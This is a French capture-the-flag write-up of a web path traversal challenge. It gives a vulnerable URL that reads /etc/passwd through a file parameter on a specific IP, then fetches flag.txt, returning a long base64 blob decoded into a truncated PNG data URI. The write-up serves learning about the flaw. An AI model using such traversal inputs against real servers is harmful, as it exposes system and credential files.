EXPLOITATION D'UNE VULNERABILITE DE TRAVERSEE DE CHEMIN (File Reader)

ÉNONCÉ  DE L’ÉPREUVE:

File Reader
Recherche et lis le fichier
http://51.91.120.156/rumble/Point: 300
Type: Web

Définition de la vulnérabilité du traversée de chemin:

        C'est la vulnérabilité que donne la technique d'attaque par traversée de chemin d'accès (path traversal) qui permet à un pirate d'accéder aux fichiers, répertoires et commandes résidant potentiellement en dehors du répertoire racine des documents internet. Un agresseur peut manipuler une URL de telle sorte que le site internet exécutera ou révélera le contenu de fichiers arbitraires situés n'importe où sur le serveur internet. Tout dispositif qui expose une interface HTTP est potentiellement vulnérable à la traversée de chemin.

 Nous sommes confronter à ce site:

En le faisant passer dans un scanner de vulnérabilité, le rapport nous indique la présence d'une vulnérabilité de Traversée de chemin

Nous apprenons ainsi l'url vulnérable:   http://51.91.120.156/rumble/index.php?file=%2Fetc%2Fpasswd

Essayons de remplacer le fichier passwd par flag.txt pour voir.

Nous avons 

ZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFvQUFBQUhnQ0FZQUFBQTEwZHprQUFBQmhXbERRMUJKUTBNZ2NISnZabWxzWlFBQUtKRjlrVDFJdzBBWWh0K21Ta1VyRG5ZUWNjaFFkYkVnS3VLb1ZTaENoVkFydE9wZ2N1a2ZOR2xJVWx3Y0JkZUNneitMVlFjWFoxMGRYQVZCOEFmRXhkVkowVVZLL0M0cHRJang0TzRlM3Z2ZWw3dnZBS0ZlWnByVk1RNW91bTJtRW5FeGsxMFZRNi9vUVJnUldrZGxaaGx6a3BTRTcvaTZSNER2ZHpHZTVWLzM1K2hWY3hZREFpTHhMRE5NbTNpRGVIclROamp2RTBkWVVWYUp6NG5IVExvZzhTUFhGWS9mT0JkY0ZuaG14RXluNW9ranhHS2hqWlUyWmtWVEk1NGlqcXFhVHZsQ3htT1Y4eFpuclZ4bHpYdnlGNFp6K3NveTEya09JWUZGTEVHQ0NBVlZsRkNHalJqdE9pa1dVblFlOS9FUHVuNkpYQXE1U21Ea1dFQUZHbVRYRC80SHYzdHI1U2NudktSd0hPaDhjWnlQWVNDMEN6UnFqdk45N0RpTkV5RDRERnpwTFgrbERzeDhrbDVyYWRFam9HOGJ1TGh1YWNvZWNMa0RERHdac2ltN1VwQ21rTThENzJmMFRWbWcveGJvWHZQNjFqekg2UU9RcGw0bGI0Q0RRMkNrUU5uclB1L3VhdS9idnpYTi92MEFVQWR5bVZKQnZSa0FBQUFHWWt0SFJBRC9BUDhBLzZDOXA1TUFBQUFKY0VoWmN3QUFDeE1BQUFzVEFRQ2FuQmdBQUFBSGRFbE5SUWZqQ3d3VURSSThPa21NQUFBQUdYUkZXSFJEYjIxdFpXNTBBRU55WldGMFpXUWdkMmwwYUNCSFNVMVFWNEVPRndBQUdoVkpSRUZVZU5ydDNYbVVsWFhoeC9IUEtMS0lLRkdCUjNIZmNBbE5KS0VSd3kwT2tRZERUVVVSUWpFeVJNTThnb29MWVhyRUxVWE5CUmNJam1VS1pFcUtJb3FpU2U0S0NFaG1nd2tWY0dSK0lwdjM5MGZuVHNBc0REZ1M0T3QxenZ6RFBQZTU5OW51ZmMvemZPOURTYUZRS0FRQWdDK05yYXdDQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQUFBUWdBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUFBQ0VBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUlBQUJBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQVFnQUlBQUJBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQUVJQUlBQUJBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0FBQUNFQUFBQUVJQUlBQUJBQkFBQUlBSUFBQkFCQ0FBQUFJUUFBQUJDQUFBQUlRQUFBQkNBQ0FBQVFBUUFBQ0FDQUFBUUFRZ0pCWnMyWmw1TWlSK2ZHUGY1d2pqamdpN2R1M3ovbm5uNTl4NDhabDBhSkZTWkpseTVhbHBLUmt2WCtlZXVxcEpFbi8vdjNYT2UzcnI3OWVKOHRUS0JUU3ExZXZsSlNVcEZ1M2J2bnNzODhxVFROeTVNaVVsSlJrekpneHRacm5JNDg4a3BLU2t0eDExMTFWUHQ4YmI3eVIyMjY3TGFlZGRsb09QUERBZlAvNzM4OFZWMXlScDU1NktrdVhMcTEydnNYMU1tUEdqQ3IvdmZpei9mYmI1OGdqajB5UEhqMXkvZlhYWjhLRUNWbXdZRUdOcjdtNmVhOXIrdlhaUm1zL3g2SkZpMUpTVXBKZGR0a2x5NWN2ci9KNW5uMzIyWXI1ZmZqaGgxVk9NM3YyN0pTVWxPU1VVMDdab0dXNjZxcXJVbEpTa2xkZmZYVzkxM2xkcnErU2twTE1uajE3blk4NytPQ0RjODQ1NTJUMDZOSDU1ei8vV2F2bk92REFBOU9qUjQvY2VlZWRlZSs5OTJwMVhHem9mcnE2dVhQblp2VG8wVG52dlBOeXpESEg1T0NERDg2Wlo1NlplKzY1SjIrLy9YYVZ4MXRkTHNPNmp1M3FublBzMkxFMVR2dlFRdzlWVEh2aGhSZHVsSG5WZE55Lzg4NDcxYzUvNE1DQlZlNWJkYkdkdnRRSzhDV3haTW1Td2k5KzhZdENrbXAvV3Jac1daZzRjV0poNmRLbE5VNVgzYy9FaVJNTGhVS2hjTjU1NTYxejJ0ZGVlNjFPbG12T25EbHJ6SGZHakJtVnB2bnJYLzlhU0ZJb0xTMHRMRisrdk1iNXJWeTVzdENsUzVkQ2tzS3NXYlBXK04zaXhZc0xGMTEwVVkzTDFiRmp4eXBmdytyclpmcjA2VlgrKzdwK2hnOGZYaWd2TDErdmVWZG5RN1pSVmMvUm8wZVBRcExDN05tenEzeWVtMisrdVdKK3p6NzdiSlhUUFByb280VWtoZnZ1dTIrRGx1bktLNjhzSkNtODhzb3I2NzNPNjNKOVZiWFByT3R4Qnh4d1FLWDlwVGJQOWVTVFQxYjdXai92Zmxvb0ZBcmw1ZVdGYTY2NVpwMnZvMi9mdm9XLy8vM3ZHN1MrYWxxRzJoN2IxVDNuOGNjZlgxaTVjbVdWMDYxWXNhTFFxVk9uaW1rSERCaXdVZVpWMDNGLzdybm5GbGF0V2xYbGMxeDg4Y1ZWN2x0MXNaMit6SndCNUV0aDZkS2x1ZUNDQ3pKNDhPQ1VscGJtOGNjZnp6Lys4WThzVzdZc0sxYXN5S0pGaS9MeXl5L25wSk5PeW5ISEhaZnk4dklVQ29WS1A2Kzk5bHFTNU9LTEw2N3k5OGNlZSt3YXp6dDkrdlFxcHlzVUNqbmtrRVBxWk5rbVQ1NmNKQmsrZkhpUzVPbW5uNjQwemU2Nzc1NCtmZnJraFJkZXlOdHZ2MTNqL041OTk5MDg5dGhqT2ZYVVU3UDMzbnRYL1Bzbm4zeVNjODg5TjhPR0RVdW5UcDN5M0hQUFpkR2lSVm01Y21VKytlU1R6Smd4SXdNSERzemt5WlB6bmU5OEo3Tm16VnJ2WlZsOWZhMVlzU0lmZi94eFpzMmFsUWNlZUNETm16ZFB2Mzc5Y3RGRkY5WDY3TTM2UHVlR2JLUGlObi8zM1hjci9lNnp6ejdMd3c4L25BRURCbVRmZmZldDlxenZ5eSsvbkNRNTZLQ0ROdmxqcWFiMVZTZ1VzczgrKzZ6emNaOSsrbW5tekptVGZ2MzZaZnIwNlJrd1lFQ1ZaMUJYZjh5eVpjc3liOTY4WEhmZGRVbVNNODQ0SXdzWExxejBtTHJZVDVjdVhacnp6ejgvZ3dZTlNtbHBhZjc0eHorbXJLd3NuMzc2YVZhdFdwWHk4dkxNbmowN1k4YU15WFBQUFplYmJycXBWdXVydHN1d1BzZDJWUzY1NUpJOCt1aWoxUjZETTJmT3pCTlBQSkhMTHJ0c284NnJPdTNhdGN2dHQ5OWU1Um5zZGIydjE5VjJjZ2tZdGxCanhvekppQkVqOG9NZi9DRGp4bzFMNTg2ZHMrT09PNlorL2ZxcFY2OWVtalp0bXJadDIrYkdHMi9NcEVtVFVsSlNzbGtzMTZlZmZwcGJicmtsSFRwMFNPL2V2ZE9wVTZkY2UrMjFLUzh2cnpUdHFhZWVtaVI1NG9rbmFweG44VEwybVdlZXVjWjZHRFZxVk1hTUdaTVRUend4WThhTVNZY09IZEswYWROc3ZmWFdhZFNvVVZxMWFwV2hRNGZtbGx0dXlZSUZDekpnd0lBc1c3WnNnNWV0WHIxNmFkS2tTZmJaWjUrY2VlYVptVFp0V3RxMWE1Yzc3cmdqRHovODhDYXpEWXJSOXVjLy83blM3ejc2NktOTW1USWxSeDExVkhyMDZKR3hZOGRXdWhTMWZQbnkzSGZmZlVtU3ZmYmE2MHR4UERabzBDQjc3YlZYcnJycXFyUnMyVElUSmt6SW5EbHphbnhNL2ZyMXM5Tk9PK1g4ODg5UHg0NGRzMkRCZ2lvdkNkYkZmanA2OU9pTUdERWlKNTU0WXNhUEg1OHVYYnBrNTUxM1RvTUdEYkxWVmx1bGNlUEcyWHZ2dlhQYWFhZGw2dFNwK2ZhM3YxMnI1YTd0TXF6dnNiMjI0NDgvUGtueXpEUFAxSGlNZCtuU1phUE9xenFYWDM1NWt1U21tMjdLeXBVcmEvMjRMMm83Q1VEWVFpeGN1REEvKzluUGtpUlhYMzExdnZhMXIxVTdiVWxKU1k0NjZxaDg5YXRmM1N5VzdmWFhYOCtiYjc2WnZuMzdwbEdqUmpuNzdMTlRWbGFXVjE1NXBkSzBiZHUyVGZQbXpmUExYLzR5aXhjdnJuSis1ZVhsR1Rac1dKTGs4TU1QWDJNZFhuVFJSVW1TSVVPR3BGbXpabFUrZnV1dHQ4N1paNStkNDQ0N0xvODk5bGlWVWJTaGR0MTExOXg4ODgxSmtrR0RCdFhxZzNCajJIUFBQWk1rOTkxM1g2V3pXTVZ4WHZ2dHQxL2F0R21UeVpNbjU2T1BQbHBqbWc4KytDQmxaV1hwM3IxN3Z2S1ZyM3lwanMxbXpacmxoQk5PU0pKMWp2RmNQYUtLKytZbm4zeFM2VmovdlB2cHdvVUxNMkRBZ0lyM2kzVzlGK3l3d3c0NThjUVQxMnU1YTFxR0RUbTIxOWFpUll0Y2NjVVZ1ZUdHR3lyTnY3eThQTmRjYzAyR0RoMmFyMy85Nnh0MVh0VnAxYXBWYnJqaGhvd1pNeVpUcDA2dDlmdjZGNzJkQkNCczVtYk1tSkVsUzVha1I0OGVhZFdxMVJhMWJPUEhqMCtTbEphV0prbkZYN2kvLy8zdkswM2JwRW1UREJ3NE1FdVdMTW0wYWRPcW5OOHJyN3lTc3JLeURCMDZkSTBQeituVHAyZkpraVhwM3IxNzl0OS8veHBmVTZOR2pkSzNiOThreWZQUFAxK255OXVtVFp1MGJkczJaV1ZsbVR0MzdpYXhEWm8yYlpxZVBYdW1yS3dzSDN6d1FhVVA4ZWJObTJlWFhYYkp2dnZ1bXlTVnpuUVZMeDEzNnRUcFMzMmMxdmFzKy9MbHl5c2lZZTBQL2JyWVQ0dno2Tm16Wi9iYmI3OHZaRmxyV29ZTk9iYXIwcVZMbDh5ZE83ZGkyTXJxeC9pQ0JRdlN1WFBuV3IvZXVweFhkYnAzNzU0a3VmYmFhMnQxNVdCamJDY0JDSnU1NGlXV2poMDdiamFYZG10ai92ejV1ZmJhYTNQV1dXZGx0OTEyUzVMc3ROTk82ZCsvZjRZUEg1NnlzckpLai9udWQ3K2JKTlYrRzdoNGFmVjczL3ZlR3Y5ZWpKYWpqejY2VnV1dytJYjg2S09QMXVreTE2dFhMMTI3ZGsyU3pKczNiNVBaRnNjY2M4d2FNWmY4NXh1YzQ4YU5TKy9ldmRPd1ljUHNzc3N1YWRteVpkNTQ0NDAxSGx1TThjMWgvRjlkVzdod1ljYU5HNWNrNnp5RHRIejU4c3liTnk4MzNuaGpwa3laa3E1ZHUxYjZnNjR1OXRQaVBMN3puZTk4SWVHM3JtWFkwR043YmExYnQwN3IxcTN6aHovOG9kSXgzclp0Mi9YYTMrcHlYdFhaY2NjZGMvZmRkMmZDaEFtWk5HblNPcWYvSXJlVEFJUXQ2RU9tcHIrMHYwZ0hISEJBbGJmSytQV3ZmLzI1NS8zQ0N5OGsrZS9ZdnFKdTNib2xTYVpNbVZMcE1hMWF0VXJuenAxei8vMzM1LzMzMzEvamQvUG16Y3V0dDk2YTB0TFNTbS9veFhWWTArWHoxVzIvL2ZaSmtwZGVlbW05eHZUVVJvc1dMWklrSDMvODhTYXpqUTQ4OE1Bay8vMHlSL0tmOFgrVEprMnF1TlJYdjM3OS9PaEhQOG9qanp5U1FxR1FKRm14WWtWR2pScVY1TCtYa3Rmbk5SWi9ycnp5eXYvNVBsMjh2VXR0TEZ1MkxPKzk5MTZ1dlBMS2xKV1ZwVk9uVGxXT2Yxejl1Um8wYUpDV0xWdG0wS0JCNmQrL2YrNjg4ODdVcjErL3p2ZlQ0cTJncXJ0OC9Qenp6MWU1N0gvNzI5L1d1YjVxc3d3YmVteXZyVUdEQmpuLy9QTnozWFhYWmY3OCtXc2M0LzM2OWF2eWVUZkd2R3JTclZ1M3RHelpNa09HRE1uLy9kLy8xVGh0WFc4bkFRaGJzQzNwN04rcVZhdHk3NzMzSmtrT08reXdOWDdYcGsyYk5HL2VQSGZjY1VkV3JGaXh4dStLWTUrUzVMbm5ucXYwaHBra1AvM3BUN1BOTnR0c3N1dXdHRStiMHZZc3h0dTk5OTViTVE2d2VJWmk5VE04YmR1MlhXTWM0QWNmZkpDNWMrZW1SNDhlYWRxMDZSWjkvSzBlUWcwYk5zemVlKytkVzIrOU5mdnV1Mjl1dXVtbU5HalFvTlpubzg0KysreUtQd1RxZWovZEdQdFhUY3V3b2NkMlZZcG54MTU4OGNVa3FianMzS0ZEaC9WK3pYVTVyK28wYTlZc3c0WU55MHN2dlpRSkV5WnNkdThEQWhBMk1jVy9FUC8xcjM5dDlPZXU3cFlaeGJGSEcycm16Smw1N0xISGN2WFZWMWNLaCsyMjJ5NlhYSEpKcGt5WlV1VXRYNHBqaW9ZUEgxNFJLeXRYcnF5NDZYTlZiK2pydXc2TForZmF0V3VYZXZYcTFlazZMWDVab0VtVEpwdk1ObXJhdEdsNjllcTF4ampBTjk5OE0wMmFOS200aEpmODk1SmpNUTZMdDlZb1hwcGYzOWRZL05tWVp3QnJlaTFyWDk2dUtRWjc5KzZkVWFOR1pjcVVLZFdPMTF2OXVjckx5L1BjYzgrbHZMdzhwYVdsVlg1N3RpNzIwK0k4cXJzOXl4RkhITEhHTXA5ODhzbTFYbCsxV1liUGMyeFg5WWRKOSs3ZGMvLzk5MmY1OHVVWk1XSkVldmJzbWQxMzMzMkQvc2lwcTNuVnBFdVhMam4wMEVOejZhV1hWdnRsdFM5aU93bEEyQUlWNzBzMmVmTGtpcjhhTjNkUFB2bGtrdVRTU3krdDhqTEhCUmRja0NSNS9QSEhLejIyUllzV0dUaHdZS1pObTVhMzNucXI0a05xMHFSSjZkZXZYMXEyYkZucE1jWDdBVDc5OU5PMVdvZkZzWERGVzBqVWxaVXJWMVlNanEvcWRmNHZyVDRPc0ZBb1pQejQ4ZW5UcDA4YU5XcFVNYzJ1dSs2YUprMmFWTndQc0hqSnVIZ0plVXUyZWdpOTg4NDdHVEZpUk00NDQ0dzBiOTY4Vm85djNMaHhPblRva0pFalIyYkpraVc1L1BMTEt3MHZxSXY5dERpUFo1OTl0czdYUVcyVzRmTWMyMnNyS1NuSjZhZWZudkhqeDJmMDZORjU0b2tuMHIxNzl3MDZhMWFYODZwSmt5Wk5jdFZWVjJYV3JGa1Y0ME9yOGtWdUp3RUlXNGo5OTk4L1RabzB5YWhSb3pKejVzek5mbm1XTEZtU2E2Kzl0bGJUWG5iWlpSVmpaVlpYL0NKRjhUSkw4VVBucEpOT3F2YU1UWk1tVFRKbXpKaDEvdGRoUzVjdXJUaWJlTVFSUjlUcHNyLzY2cXVaTm0xYVdyWnNtVDMyMkdPVDJpNnJqd09jUDM5K0prNmNXT20rWXcwYk5zeFBmdktUUFBMSUkxbTJiRmxHamh4WmNYYUYybW5mdm4zNjlldVhCeDk4c09KeVpGM3VwOFY1M0gvLy9SdDBNL1BQc3d4MWNXeXZyVjI3ZGttUzNyMTdKL25QTUlRTlZaZnpxc214eHg2YjQ0NDdMdjM3OTYvMjlrQWJZenNKUU5qTU5XdldyT0lPOEpkZWVtbU5sNGNLaFVLZWVlYVovUHZmLzk1a2wyZmF0R2xac0dCQnJyLysraG92Qzk1enp6MUovalBBZlcySEhISklXcmR1bmNHREIyZnUzTGtaTW1SSVdyWnNtVFp0MmxTN0RvdjNCN3o4OHN1cnZleXlhdFdxakJneElrODg4VVE2ZCs2OHhyMEVQNit5c3JLSyszNWRjODAxMlc2NzdUYXA3Ykw2T01EaTVibXF2dUhacmwyN1RKNDhPUys4OEVMbXpwMmJYcjE2WlljZGRuQ2cxdlpEYTZ1dEtzYXhybjNqNExyWVQ1czFhNVliYjd3eFNUSjQ4T0FhLzZlT3VsNkd1amkycXpwMmkwTUVoZzRkK3JudU5WbVg4NnBKdzRZTk0yalFvQ3hac2lTLy9lMXZxMzB0WC9SMkVvQ3dCZWpldlh2T091dXNqQjA3TnQyNmRjdWYvdlNueko4L1B5dFdyTWlxVmF1eWVQSGkvT1V2ZjhtRkYxNllvNDgrZXBPK1ZGeDhRMXo3djUxYjI1RkhIcGtrR1RseVpLWGxhZGl3WWZyMzc1OGsrZm5QZjU0bFM1Wms0TUNCTlVaVmp4NDljdXFwcCtiaGh4L09HV2Vja1NsVHBtVHg0c1g1N0xQUHNuVHAwc3ljT1RPREJ3L09lZWVkbCtiTm02L1h3UDdxUHFUTHk4c3paODZjL09ZM3Ywbjc5dTN6d2dzdnBHL2Z2cHZrRFYxMzJHR0g5TzdkTzJWbFpSVWZURldOanlwRzRmWFhYMStyN1VobDMvakdOOUtuVDUrTUhUdDJqVzllMTlWK2V2cnBwK2Vzczg3SzczNzN1NXh3d2dsNS9QSEg4K0dISDJiWnNtVXBGQW9WdDNNWk4yNWN4YmpIOWIwVVd0VXkxTVd4WFpVcnJyZ2loVUlobDE1NjZlZGU5M1U1cjVvY2NjUVJPZm5razlPL2YvOXFML051ak8yMEphdG5GZkJsMEtoUm85eDg4ODNaYmJmZGN2bmxsMWQ3NDlJOTk5d3pFeWRPM0dUL0o1RDMzMzgvZDkxMVYwcExTM1BBQVFmVU9PMWVlKzJWcmwyNzVzRUhIOHlRSVVNcS9SK3RIVHQyVEpLTUhUczJ5WC9Ic0ZWbjIyMjN6UjEzM0pHZGQ5NDVOOXh3UTdYZjB1dllzV051di8zMkRibzU2N3FXYWZqdzRlblZxOWNhNCtyV2R4NExGeTc4d3M1Y0hIWFVVYm4zM25zelljS0U5T3ZYTDQwYk42NDBUZkZMSWNYMTk3OGUvN2UrNjJ0ZDAwK2NPUEVMajlxdHR0b3E1NXh6VHU2KysrN2NkdHR0T2Z6d3c3UDExbHZYMlg3YXFGR2ovT3BYdjhwZWUrMVY4YVdMNmh4NjZLR1pOR25TZW85SlhYc1pXclJvVVdmSDlwWmdtMjIyeVlVWFhwaUhIbnFvMmpPZEcyTTdDVURZQW15MzNYWVpQSGh3VGpubGxFeWRPalZUcDA3TlcyKzlsVldyVnFWOSsvWTU2cWlqMHJGangwMzZkaHpGTjdpK2ZmdFdlNnVXMVQ5Z2V2YnNtZkhqeCtlWlo1NnA5Q0d4NTU1N3BtZlBubm5nZ1FmU3RXdlhpditwb2laTm16Yk5zR0hEY3NZWlorVDU1NS9QbENsVDh2cnJyMmVQUGZiSXQ3NzFyUng1NUpFcExTMnRNZEJxcTdTME5IdnNzVWRhdDI2ZGd3NDZxT0lXR0p1eTFlK2ZXTjM0eDIyMzNUYjkrL2ZQTGJmY2tpU2IzRmpHemNVM3Yvbk45T2pSSTZOR2pjb0ZGMXl3eG5pMHV0aFBHemR1bkVHREJ1V0hQL3hoWG56eHhVeWRPalZ2di8xMjVzK2ZuNE1QUGppSEgzNTREanZzc0xSdDJ6YmJicnZ0NTE2RzRzM1o2K0xZM2xLMGJkczJmZnIweWQxMzMvMC8zVTVicXBMQ2x2SzFTQUFBYXNVWVFBQUFBUWdBZ0FBRUFHQ0w0VXNnOEQrMlBzTnczY0lBQUFFSW03a1ZLMWFrZnYzNnRaNSsrZkxsNi95R0lBQ3NpMjhCQXdCOHlSZ0RDQUFnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBQUFJUUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBQUFJUUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQkNBQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUlBQUJBQVFnQUFBQ0VBQUFBUWdBZ0FBRUFFQUFBZ0FnQUFFQUVJQUFBQWhBQUFBRUlBQUFBaEFBQUFFSUFJQUFCQUJBQUFJQUNFQ3JBQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBQUFJUUFBQUJDQUNBQUFRQVFBQUNBQ0FBQVFBUWdBQUFDRUFBQUFRZ0FJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBQUFJUUFBQUJDQUNBQUFRQVFBQUNBQ0FBQVFBUWdBQUFDRUFBQUFRZ0FJQUFCQUJBQUFJQUlBQUJBQkNBQUFBSVFBQUFCQ0FBQUFJUUFBQUJDQURBRitiL0FWL28xZ2ZKSlFDT0FBQUFBRWxGVGtTdVFtQ0M=

La présence de = à la fin nous indique qu'il pourait être un encodage base64. Essayons de décoder

data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAoAAAAHgCAYAAAA10dzkAAABhWlDQ1BJQ0MgcHJvZmlsZQAAKJF9kT1Iw0AYht+mSkUrDnYQcchQdbEgKuKoVShChVArtOpgcukfNGlIUlwcBdeCgz+LVQcXZ10dXAVB8AfExdVJ0UVK/C4ptIjx4O4e3vvel7vvAKFeZprVMQ5oum2mEnExk10VQ6/oQRgRWkdlZhlzkpSE7/i6R4DvdzGe5V/35+hVcxYDAiLxLDNMm3iDeHrTNjjvE0dYUVaJz4nHTLog8SPXFY/fOBdcFnhmxEyn5okjxGKhjZU2ZkVTI54ijqqaTvlCxmOV8xZnrVxlzXvyF4Zz+soy12kOIYFFLEGCCAVVlFCGjRjtOikWUnQe9/EPun6JXAq5SmDkWEAFGmTXD/4Hv3tr5ScnvKRwHOh8cZyPYSC0CzRqjvN97DiNEyD4DFzpLX+lDsx8kl5radEjoG8buLhuacoecLkDDDwZsim7UpCmkM8D72f0TVmg/xboXvP61jzH6QOQpl4lb4CDQ2CkQNnrPu/uau/bvzXN/v0AUAdymVJBvRkAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjCwwUDRI8OkmMAAAAGXRFWHRDb21tZW50AENyZWF0ZWQgd2l0aCBHSU1QV4EOFwAAGhVJREFUeNrt3XmUlXXhx/HPKLKIKFGBR3HfcAlNJKERwy0OkQdDTUURQjEyRMM8gooLYXrELUXNBRcIjmUKZEqKIoqiSe4KCEhmgwkVcGR+Ipv390fnTsAsDDgS4Ot1zvzDPPe599nufc/zfO9DSaFQKAQAgC+NrawCAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAgAAEAEIAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAgAAEAEIAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAgAAEABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAgAAEABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEAEAAAgAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAgAAEABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEAAAAQgAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAAACEABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQA